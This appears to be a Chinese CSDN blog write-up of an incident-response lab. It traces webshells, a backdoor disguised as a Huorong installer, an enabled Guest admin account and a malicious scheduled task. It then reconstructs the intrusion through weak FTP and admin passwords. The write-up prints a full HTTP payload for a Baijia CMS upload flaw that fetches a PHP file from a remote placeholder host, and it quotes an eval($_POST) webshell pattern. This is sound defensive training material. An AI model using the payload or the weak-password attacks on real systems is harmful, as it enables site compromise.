应急响应靶场-Where-1S-tHe-Hacker-P2

最新推荐文章于 2024-06-19 17:39:39 发布
最新推荐文章于 2024-06-19 17:39:39 发布
阅读量805 收藏 21
点赞数 25
分类专栏: 应急响应 windows 文章标签: windows 应急响应
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hide_in_darkness/article/details/139467481
版权

文章目录

关注我们,咱们在安全的路上,扬帆起航

在这里插入图片描述

Where-1S-tHe-Hacker-P2

0.场景描述

​ 水哥是某公司的一名运维,某天他在日常巡检的过程中发现了异常,敏锐的他感觉到了事情的不妙,于是联系同事要到了你的电话,请你帮助他解决这个难题。

1.隐患排查

​ 本文的思路仅仅是按照靶场内容建设,并不与真实环境下的排查方案一致

靶机用户和密码
用户:admin
密码:Aa123456

在这里插入图片描述

1.1 webshell 后门查杀

​ 使用D盾、河马等查杀工具,对web目录下的文件进行查杀

在这里插入图片描述

在这里插入图片描述

​ 可以看到一大堆意思后门,且内容均为 eval($_POST[]);` 形式,打开文件对应位置,并且查看文件信息:创建时间、修改时间和访问时间,根据创建时间可以知道文件落地时间

在这里插入图片描述

1.2 后门查杀

​ 针对后门查杀,我们可以使用杀毒软件直接进行查杀,这里我使用的是火绒

在这里插入图片描述

​ 排除webshell的干扰,我们可以看到在 C:\windows\Temp 下存在一个可疑文件 huorong.exe

在这里插入图片描述

​ 打开文件相应位置可以看到是一个伪装成火绒安装包的后门文件,查看文件属性创建时间为2023年11月15日7:45:47

在这里插入图片描述

1.3 后门用户检测

1.3.1 windows event

​ 可以使用windows的时间管理工具中的日志筛选功能,对事件ID为4720和4732的时间进行筛选

在这里插入图片描述

1.3.2 D盾克隆账号检测

​ 也可以使用D盾的克隆账号检测功能,这里我们尝试使用D盾的克隆账号检测功能

在这里插入图片描述

​ 在扫描的结果中,可以很清晰的看到,Guest账号被启用并添加进管理员组

在这里插入图片描述

​ 为什么首当其冲的怀疑这个账号呢?

1.3.2.1 Guest账号

​ Windows中的Guest账户是一个特殊的用户账户,它允许用户在没有创建个人账户的情况下访问计算机。由于Guest账户的权限较低,它不适合需要执行高级任务或访问敏感信息的用户

1.4 计划任务、服务、开机自启动项查杀

​ 这里我们可以使用独立安装版火绒剑,这款工具官方已经下架,需要自己搜寻一下资源,而且目标主机上最好不要安装火绒最新版,最新版的火绒会识别火绒剑的程序并禁用

​ 打开火绒剑,一次查看 启动项 -> 计划任务 ,我们可以很清晰的看到一个安全状态为未知的疑似火绒安装包程序被加入了开机启动项程序,右键查看属性,可以看到,正是我们之前通过火绒查杀出来的后门文件

在这里插入图片描述

​ Win+R,输入 taskschd.msc 启动任务计划程序,定位到 \Microsoft\Windows\AppID\ ,找到上文中 Microsoft SysnomCon 程序

在这里插入图片描述

​ 右键导出异常计划任务 Microsoft-SysnomCon 即可查看到详细信息,这里显示注册时间为2023年11月15日8:02:20

在这里插入图片描述

2. 利用链分析

2.1 FTP 弱口令

​ 攻击者尝试使用 anonymous 和 ftp 用户尝试登录

在这里插入图片描述

​ 使用 ftp/123456 成功登录主机FTP服务

在这里插入图片描述

​ 可以看到我们当前 FTP 所在的目录正是 webshell 的目录

在这里插入图片描述

2.2 站点后台管理员弱口令

​ 对于一个 web 站点,我们通常会尝试对其登录页面进行弱口令登录尝试,登录成功往往会有 Js 页面跳转Get Param url跳转30x 页面重定向 等标志

在这里插入图片描述

​ 访问首页地址 http://localhost/index.php?mod=mobile&act=public&do=index&beid=1 ,发现是一个登陆界面,我们尝试对其账号密码进行弱口令爆破

在这里插入图片描述

​ 成功使用 admin/123456 成功登录管理员后台界面

在这里插入图片描述

2.3 Baijia CMS 后台任意文件上传漏洞

​ payload:

GET /index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http://远程地址/文件.php HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pusi68o14jke80q64hcg8ram20; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=
Connection: close

​ 可以加载指定URL文件到本地,存储路径会在 HTTP Response 中显示,这里我们尝试上传一个不同域中的

在这里插入图片描述

​ 访问返回包中的路径,成功显示 PHPinfo 的内容,文件上传成功

在这里插入图片描述

​ 可以在 /index.php?mod=site&do=file&act=public&op=local&beid=1 路径中查看到所有上传文件的路径

在这里插入图片描述

​ 上面排查的webshell后门可以分析一部分可能是通过 FTP 上传功能上传到web站点的,一部分可能通过此处文件上传漏洞上传的

在这里插入图片描述

​ 可以在web日志中很清楚的看到后门文件通信的时间

在这里插入图片描述

hide_in_darkness
关注
  • 25
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
2023年网络安全专家都在用的应急响应-常用工具
WANGJUNAIJIAO的博客
10-02 283
Sysinternals Suite是微软发布的一套非常强大的免费工具程序集。下载链接: https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite其中包含:(只列举部分)为了确保创建安全的环境,Windows 管理员通常需要了解特定用户或用户组对文件、目录、注册表项和 Windows 服务等资源具有哪种访问权限。AccessChk 能够通过直观的界面和输出快速回答这些问题。
应急响应靶机训练-近源渗透OS-1
Liyu_6618的博客
05-07 1095
应急响应靶机训练-近源渗透OS-1
【实景挑战 | 应急】应急靶机01: Where-1S-tHe-Hacker
qiu_muya的博客
03-29 486
3-5、这里应该用划水应急工具里面webshell查杀去杀的 但是我在翻找文件的时候翻到了 看到这两个文件的修改时间和别的文件有些大 并且符合黑客攻击网站的时间,找到两个webshell。2、打开phpstudy目录 看到主页文件最后修改时间 ‎2023‎年‎11‎月‎6‎日,‏‎4:55:13。9、接着往下翻 将时间固定在4:30-5:00之间 接着往下翻可以看到找到黑客对密钥文件的操作。8、搜索ID 4732 加入管理组 时间为:2023/11/6 4:46:07。打开D-Eyes_直接扫描。
OWASP安全练习靶场juice shop-更新中
seanyang_的博客
12-05 2712
Juice Shop是用Node.js,Express和Angular编写的。这是第一个 完全用 JavaScript 编写的应用程序,列在。该应用程序包含大量不同的黑客挑战 用户应该利用底层的困难 漏洞。黑客攻击进度在记分板上跟踪。找到这个记分牌实际上是(简单的)挑战之一!除了黑客和意识培训用例外,渗透测试 代理或安全扫描程序可以将 Juice Shop 用作“几内亚” pig“-应用程序来检查他们的工具如何应对 JavaScript 密集型应用程序前端和 REST API。部署。
The-hacker-playbook3最新版PDF
11-03
The-hacker-playbook3最新版PDF,从某安全群里面分享得到,同步共享给大家
hacker-news-api:官方Hacker News APIJavaScript包装器
04-29
$ npm install --save @moondef/hacker-news-api 或者 $ yarn add @moondef/hacker-news-api const hk = require ( '@moondef/hacker-news-api' ) ; ( async ( ) => { const popular = await hk . getPopular ( ) ;...
hackerrank-interview-preparation-kit
03-17
hackerrank-interview-preparation-kit
Oracle 11g Anti-hacker's Cookbook
04-18
ORACLE数据库安全性方面的一本力作,详细介绍了ORACLE 11G安全的工作原理以及在烦黑客方面的应用技术。
hackernews-daily:黑客新闻每日十大帖子
03-31
它是如何工作的脚本每天都在hackernews上获取热门帖子它在此仓库中打开了一个问题,并存储了标题人们可以通过观看此回购或通过订阅新期刊谢谢黑客新闻API的用于从问题生成RSS文件用于托管RSS feed 的灵感相关标题...
conda命令
最新发布
u013092227的博客
06-19 147
更新包删除包。
206. 反转链表
chengkai730的博客
06-18 278
2024年6月18日
Windows 命令行界面常用命令
喻师傅的学习笔记
06-18 442
命令行界面常用命令
234. 回文链表
chengkai730的博客
06-18 212
2024年6月18日
Java新特性与性能调优
weidl001的博客
06-15 762
本文详细介绍了Java的新特性,从Java 8到Java 17的关键特性,以及性能调优的方法,包括JVM调优、性能分析工具和垃圾回收机制等。通过示例代码和表格总结,希望读者能更好地理解和应用Java的新特性和性能优化技术,从而提高开发效率和应用性能。
python文件操作(Windows路径,内置os库)+ 正则表达式(语法与re库)
smalltorch的博客
06-15 832
先介绍本部分的前置知识 ---- Windows路径知识。无。
Java中的Stream API及其应用
Programming Talk
06-16 272
Stream是元素的序列,这些元素支持顺序和并行的聚合操作。Stream不存储数据,它们只是对数据的一个视图。Stream操作可以分为两类:中间操作和终端操作。中间操作:返回Stream自身,允许链式调用,如filtermap等。终端操作:触发Stream计算,并返回结果,如collectforEach等。@Override本文介绍了Java中的Stream API及其实际应用场景。通过Stream API,我们可以以函数式编程风格简洁、清晰地处理集合数据。
数据结构篇:链表和树结构的操作方法
weixin_41489908的博客
06-15 975
本文详细介绍了链表和树结构的基本操作方法,包括单链表、双链表、循环链表的插入和删除操作,以及二叉树、二叉搜索树和AVL树的插入、查找和删除操作。通过这些代码案例,可以帮助你更好地理解和应用链表和树结构。在实际开发中,选择合适的数据结构和操作方法,可以显著提升代码的效率和可维护性。希望这些示例和注意事项能帮助你更好地掌握链表和树结构的操作方法。
tail -f -n
09-06
tail -f -n命令表示使用tail命令,以监视文件的尾部内容,并显示指定数量的行数。其中,-f参数用于实时监视文件的增长,-n参数用于指定要显示的行数。 例如,使用命令tail -f -n 20 filename将会实时显示文件filename的最后20行内容。这意味着,当文件增长时,将持续显示文件的最后20行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [tail命令 – 查看文件尾部内容](https://blog.csdn.net/m0_67268191/article/details/130734838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [说说tail](https://blog.csdn.net/hacker_Lees/article/details/93636550)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值